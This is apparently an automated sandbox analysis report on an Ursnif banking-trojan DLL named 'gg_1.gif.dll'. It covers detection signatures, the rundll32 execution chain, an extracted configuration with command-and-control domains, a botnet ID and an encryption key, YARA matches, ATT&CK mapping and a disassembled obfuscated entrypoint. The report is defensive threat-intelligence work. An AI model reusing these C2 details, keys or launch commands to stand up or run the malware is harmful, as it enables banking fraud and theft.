Play interactive tour

Edit tour

Analysis Report gg_1.gif.dll

Overview

General Information

Sample Name:	gg_1.gif.dll
Analysis ID:	382564
MD5:	53f7e96f48283df339164afadd174638
SHA1:	bd119af6c52876fb5d23398326850d87fe159735
SHA256:	4b8946f9fee32db6b42f7c0fdb70ca9ba7980c5932d3f959227cdfbef15e8c34
Tags:	dllGGGoziIFSBUrsnif
Infos:
Most interesting Screenshot:

Detection

Ursnif

Score:	68
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Yara detected Ursnif

Machine Learning detection for sample

Contains functionality to read the PEB

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

PE file contains sections with non-standard names

Program does not show much activity (idle)

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Startup

System is w10x64

loaddll32.exe (PID: 6836 cmdline: loaddll32.exe 'C:\Users\user\Desktop\gg_1.gif.dll' MD5: 542795ADF7CC08EFCF675D65310596E8)

cmd.exe (PID: 6864 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\gg_1.gif.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)

rundll32.exe (PID: 6920 cmdline: rundll32.exe 'C:\Users\user\Desktop\gg_1.gif.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 6908 cmdline: rundll32.exe C:\Users\user\Desktop\gg_1.gif.dll,DllServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

cleanup

Malware Configuration

Threatname: Ursnif

[[{"RSA Public Key": "bUd4GFcFHo0e+ZYUbkHaTKXmZ1xEyxvy7Ha6j1WAZbQ7YvMdkqTfD1vHD2y2CmFTRrLK1w5iQroYI0mUpJ4xNknlY+BmJf4xpeJRxxK0RRNeRbW5unSB2vXqxvlTgz6vNZY+9zeztuP2jXKpIm0/s+YxWnsT7eWUtQtD38NlsAPtJdp+3rBxjzAWNKQj7wMA"}, {"c2_domain": ["bing.com", "update4.microsoft.com", "under17.com", "urs-world.com"], "botnet": "5566", "server": "12", "serpent_key": "10301029JSJUYDWG", "sleep_time": "10", "SetWaitableTimer_value": "0", "DGA_count": "10"}]]

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000004.00000002.387313333.0000000004BA0000.00000004.00000001.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000005.00000002.389073217.0000000004B40000.00000004.00000001.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000001.00000002.699200830.0000000000EC0000.00000004.00000001.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security

Unpacked PEs

Source	Rule	Description	Author
5.2.rundll32.exe.4b40000.2.raw.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
4.2.rundll32.exe.4ba0000.2.raw.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
1.2.loaddll32.exe.ec0000.1.raw.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 4.2.rundll32.exe.4ba0000.2.raw.unpack

Malware Configuration Extractor: Ursnif [[{"RSA Public Key": "bUd4GFcFHo0e+ZYUbkHaTKXmZ1xEyxvy7Ha6j1WAZbQ7YvMdkqTfD1vHD2y2CmFTRrLK1w5iQroYI0mUpJ4xNknlY+BmJf4xpeJRxxK0RRNeRbW5unSB2vXqxvlTgz6vNZY+9zeztuP2jXKpIm0/s+YxWnsT7eWUtQtD38NlsAPtJdp+3rBxjzAWNKQj7wMA"}, {"c2_domain": ["bing.com", "update4.microsoft.com", "under17.com", "urs-world.com"], "botnet": "5566", "server": "12", "serpent_key": "10301029JSJUYDWG", "sleep_time": "10", "SetWaitableTimer_value": "0", "DGA_count": "10"}]]

Multi AV Scanner detection for submitted file

Show sources

Source: gg_1.gif.dll

ReversingLabs: Detection: 41%

Machine Learning detection for sample

Show sources

Source: gg_1.gif.dll

Joe Sandbox ML: detected

Source: gg_1.gif.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000004.00000002.387313333.0000000004BA0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.389073217.0000000004B40000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.699200830.0000000000EC0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 5.2.rundll32.exe.4b40000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.4ba0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.loaddll32.exe.ec0000.1.raw.unpack, type: UNPACKEDPE

E-Banking Fraud:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000004.00000002.387313333.0000000004BA0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.389073217.0000000004B40000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.699200830.0000000000EC0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 5.2.rundll32.exe.4b40000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.4ba0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.loaddll32.exe.ec0000.1.raw.unpack, type: UNPACKEDPE

Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00EA5F16	1_2_00EA5F16
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00EA13C5	1_2_00EA13C5
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00EA43D8	1_2_00EA43D8
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00EA1CD0	1_2_00EA1CD0
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00EA27D4	1_2_00EA27D4
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00EA3FAB	1_2_00EA3FAB
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00EA2FAF	1_2_00EA2FAF
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00EA88BA	1_2_00EA88BA
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00EA92B2	1_2_00EA92B2
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00EA31B3	1_2_00EA31B3
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00EA2A69	1_2_00EA2A69
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00EA2566	1_2_00EA2566
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00EA1967	1_2_00EA1967
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00EA150C	1_2_00EA150C
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00EA510C	1_2_00EA510C
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00EA1B1E	1_2_00EA1B1E
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00EA3A14	1_2_00EA3A14
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_03465F16	4_2_03465F16
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_03462566	4_2_03462566
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_03461967	4_2_03461967
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_03465262	4_2_03465262
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_03462A69	4_2_03462A69
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_03465378	4_2_03465378
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0346150C	4_2_0346150C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_03463A14	4_2_03463A14
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_03461B1E	4_2_03461B1E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_03465A25	4_2_03465A25
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_034613C5	4_2_034613C5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_034627D4	4_2_034627D4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_03461CD0	4_2_03461CD0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_034643D8	4_2_034643D8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_03462FAF	4_2_03462FAF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_03463FAB	4_2_03463FAB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_034692B2	4_2_034692B2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_034631B3	4_2_034631B3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_034688BA	4_2_034688BA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_03305F16	5_2_03305F16
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_03305A25	5_2_03305A25
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_03303A14	5_2_03303A14
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_03301B1E	5_2_03301B1E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0330150C	5_2_0330150C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_03305378	5_2_03305378
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_03305262	5_2_03305262
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_03302566	5_2_03302566
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_03301967	5_2_03301967
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_03302A69	5_2_03302A69
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_033092B2	5_2_033092B2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_033031B3	5_2_033031B3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_033088BA	5_2_033088BA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_03303FAB	5_2_03303FAB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_03302FAF	5_2_03302FAF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_03301CD0	5_2_03301CD0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_033027D4	5_2_033027D4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_033043D8	5_2_033043D8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_033013C5	5_2_033013C5

Source: gg_1.gif.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: classification engine

Classification label: mal68.troj.winDLL@7/0@0/0

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\gg_1.gif.dll,DllServer

Source: gg_1.gif.dll

ReversingLabs: Detection: 41%

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\gg_1.gif.dll'
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\gg_1.gif.dll',#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\gg_1.gif.dll,DllServer
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\gg_1.gif.dll',#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\gg_1.gif.dll',#1	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\gg_1.gif.dll,DllServer	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\gg_1.gif.dll',#1	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK

Source: gg_1.gif.dll

Static PE information: section name: .code

Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00EA709D push edi; mov dword ptr [esp], FFFF0000h	1_2_00EA709E
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00EA709D push 00000000h; mov dword ptr [esp], ebp	1_2_00EA70F5
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00EA709D push esp; mov dword ptr [esp], 00000040h	1_2_00EA711D
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00EA709D push 00000000h; mov dword ptr [esp], ecx	1_2_00EA716C
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00EA5F16 push dword ptr [ebp-0Ch]; mov dword ptr [esp], edx	1_2_00EA5F7B
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00EA5F16 push dword ptr [ebp-0Ch]; mov dword ptr [esp], eax	1_2_00EA5F94
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00EA5F16 push dword ptr [ebp-08h]; mov dword ptr [esp], eax	1_2_00EA5FDD
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00EA5F16 push dword ptr [ebp-10h]; mov dword ptr [esp], eax	1_2_00EA604B
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00EA5F16 push dword ptr [ebp-08h]; mov dword ptr [esp], eax	1_2_00EA6124
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00EA5F16 push 00000000h; mov dword ptr [esp], edi	1_2_00EA614F
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00EA5F16 push 00000000h; mov dword ptr [esp], edx	1_2_00EA625E
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00EA5F16 push dword ptr [ebp-10h]; mov dword ptr [esp], eax	1_2_00EA62B5
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00EA5F16 push dword ptr [ebp-10h]; mov dword ptr [esp], eax	1_2_00EA6343
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00EA5F16 push dword ptr [ebp-10h]; mov dword ptr [esp], eax	1_2_00EA635D
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00EA5F16 push 00000000h; mov dword ptr [esp], ebp	1_2_00EA6368
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00EA5F16 push dword ptr [ebp-0Ch]; mov dword ptr [esp], eax	1_2_00EA6385
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00EA5F16 push 00000000h; mov dword ptr [esp], edx	1_2_00EA63B4
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00EA5F16 push dword ptr [ebp-08h]; mov dword ptr [esp], eax	1_2_00EA6483
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00EA5F16 push dword ptr [ebp-08h]; mov dword ptr [esp], eax	1_2_00EA64F2
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00EA5F16 push dword ptr [ebp-10h]; mov dword ptr [esp], eax	1_2_00EA64FE
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00EA5F16 push dword ptr [ebp-08h]; mov dword ptr [esp], eax	1_2_00EA650A
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00EA5F16 push 00000000h; mov dword ptr [esp], edi	1_2_00EA6567
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00EA5F16 push 00000000h; mov dword ptr [esp], edi	1_2_00EA65A9
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00EA5F16 push 00000000h; mov dword ptr [esp], eax	1_2_00EA6610
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00EA5F16 push dword ptr [ebp-0Ch]; mov dword ptr [esp], eax	1_2_00EA6685
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00EA5F16 push dword ptr [ebp-08h]; mov dword ptr [esp], ecx	1_2_00EA66C2
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00EA5F16 push dword ptr [ebp-0Ch]; mov dword ptr [esp], eax	1_2_00EA66E8
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00EA5F16 push 00000000h; mov dword ptr [esp], edi	1_2_00EA6781
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00EA5F16 push 00000000h; mov dword ptr [esp], edx	1_2_00EA67B6
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00EA5F16 push dword ptr [ebp-0Ch]; mov dword ptr [esp], eax	1_2_00EA684C
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00EA5F16 push dword ptr [ebp-0Ch]; mov dword ptr [esp], eax	1_2_00EA6858

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000004.00000002.387313333.0000000004BA0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.389073217.0000000004B40000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.699200830.0000000000EC0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 5.2.rundll32.exe.4b40000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.4ba0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.loaddll32.exe.ec0000.1.raw.unpack, type: UNPACKEDPE

Source: C:\Windows\System32\loaddll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Windows\System32\loaddll32.exe

Thread delayed: delay time: 120000

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00EA2A69 xor edi, dword ptr fs:[00000030h]	1_2_00EA2A69
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_03462A69 xor edi, dword ptr fs:[00000030h]	4_2_03462A69
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_03302A69 xor edi, dword ptr fs:[00000030h]	5_2_03302A69

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\gg_1.gif.dll',#1

Jump to behavior

Stealing of Sensitive Information:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000004.00000002.387313333.0000000004BA0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.389073217.0000000004B40000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.699200830.0000000000EC0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 5.2.rundll32.exe.4b40000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.4ba0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.loaddll32.exe.ec0000.1.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000004.00000002.387313333.0000000004BA0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.389073217.0000000004B40000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.699200830.0000000000EC0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 5.2.rundll32.exe.4b40000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.4ba0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.loaddll32.exe.ec0000.1.raw.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation	Path Interception	Process Injection11	Rundll321	OS Credential Dumping	Virtualization/Sandbox Evasion1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Virtualization/Sandbox Evasion1	LSASS Memory	System Information Discovery1	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Junk Data	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Process Injection11	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Steganography	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Obfuscated Files or Information1	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
gg_1.gif.dll	42%	ReversingLabs	Win32.Trojan.Wacatac
gg_1.gif.dll	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

No contacted domains info

Contacted IPs

No contacted IP infos

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	382564
Start date:	06.04.2021
Start time:	10:05:22
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 7m 24s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	gg_1.gif.dll
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name:	Run with higher sleep bypass
Number of analysed new started processes analysed:	25
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal68.troj.winDLL@7/0@0/0
EGA Information:	Failed
HDC Information:	Successful, ratio: 87% (good quality ratio 76.4%) Quality average: 65.8% Quality standard deviation: 33.3%
HCA Information:	Successful, ratio: 100% Number of executed functions: 6 Number of non-executed functions: 16
Cookbook Comments:	Adjust boot time Enable AMSI Sleeps bigger than 120000ms are automatically reduced to 1000ms Found application associated with file extension: .dll
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe VT rate limit hit for: /opt/package/joesandbox/database/analysis/382564/sample/gg_1.gif.dll

Simulations

Behavior and APIs

Time	Type	Description
10:07:06	API Interceptor	1x Sleep call for process: loaddll32.exe modified

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

No created / dropped files found

Static File Info

General
File type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.127836134489194
TrID:	Win32 Dynamic Link Library (generic) (1002004/3) 99.60% Generic Win/DOS Executable (2004/3) 0.20% DOS Executable Generic (2002/1) 0.20% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	gg_1.gif.dll
File size:	118163
MD5:	53f7e96f48283df339164afadd174638
SHA1:	bd119af6c52876fb5d23398326850d87fe159735
SHA256:	4b8946f9fee32db6b42f7c0fdb70ca9ba7980c5932d3f959227cdfbef15e8c34
SHA512:	6fb9579bcafa72d3eaac9238aaa54b5e87fa1787b8d2b0ca1735e9c8dc362e318a6c100d72fcbd35ca32a472250b598350730f80f54327a7d975d9271fcba3d5
SSDEEP:	1536:tm15JsYYm3GCVS7ZicTJzRVd620ZmB9RMli0msUdqZEACW4jySTLW:eLsacThRVd6pmBPM07vYZEA4/W
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......._W...6e..6e..6e..)v..6e...w..6e.Rich.6e.................PE..L.....f`...........!................ko.............................

File Icon


Icon Hash:	74f0e4ecccdce0e4

Static PE Info

General
Entrypoint:	0x10006f6b
Entrypoint Section:	.code
Digitally signed:	false
Imagebase:	0x10000000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
DLL Characteristics:
Time Stamp:	0x6066E9D0 [Fri Apr 2 09:54:24 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	3f728412058b62c418b1091768b74d7b

Entrypoint Preview

Instruction
push ebx
push esi
and dword ptr [esp], 00000000h
or dword ptr [esp], ebp
mov ebp, esp
add esp, FFFFFFF8h
push esp
mov dword ptr [esp], FFFF0000h
call 00007F12D0900541h
push eax
add dword ptr [esp], 00000247h
sub dword ptr [esp], eax
push esi
mov dword ptr [esp], 00001567h
call 00007F12D08FF4B7h
push eax
or dword ptr [esp], eax
pop eax
jne 00007F12D09047BBh
pushad
push 00000000h
mov dword ptr [esp], esi
xor esi, esi
xor esi, dword ptr [ebx+0041C627h]
mov eax, esi
pop esi
push ebx
add dword ptr [esp], 40h
sub dword ptr [esp], ebx
push ebp
add dword ptr [esp], 00001000h
sub dword ptr [esp], ebp
mov dword ptr [ebp-04h], 00000000h
push dword ptr [ebp-04h]
xor dword ptr [esp], eax
push 00000000h
call dword ptr [ebx+0041F05Ch]
mov dword ptr [ebp-04h], ecx
xor ecx, dword ptr [ebp-04h]
or ecx, eax
and edi, 00000000h
xor edi, ecx
mov ecx, dword ptr [ebp-04h]
push edi
pop dword ptr [ebp-04h]
push dword ptr [ebp-04h]
pop dword ptr [ebx+0041CAEDh]
cmp ebx, 00000000h
jbe 00007F12D09047ACh
push 00000000h
add dword ptr [esp], edx
push dword ptr [ebx+0041C166h]
pop edx
add edx, ebx
mov dword ptr [ebx+0041C166h], edx
pop edx
push 00000000h
add dword ptr [esp], edx
push dword ptr [ebx+0041CECAh]
pop edx
add edx, ebx
mov dword ptr [ebx+0041CECAh], edx
pop edx
push ebp
and ebp, 00000000h
or ebp, dword ptr [ebx+0041C166h]

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x1a000	0x64	.data
IMAGE_DIRECTORY_ENTRY_IMPORT	0x1f0fc	0x118	.data
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x1f000	0xfc	.data
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

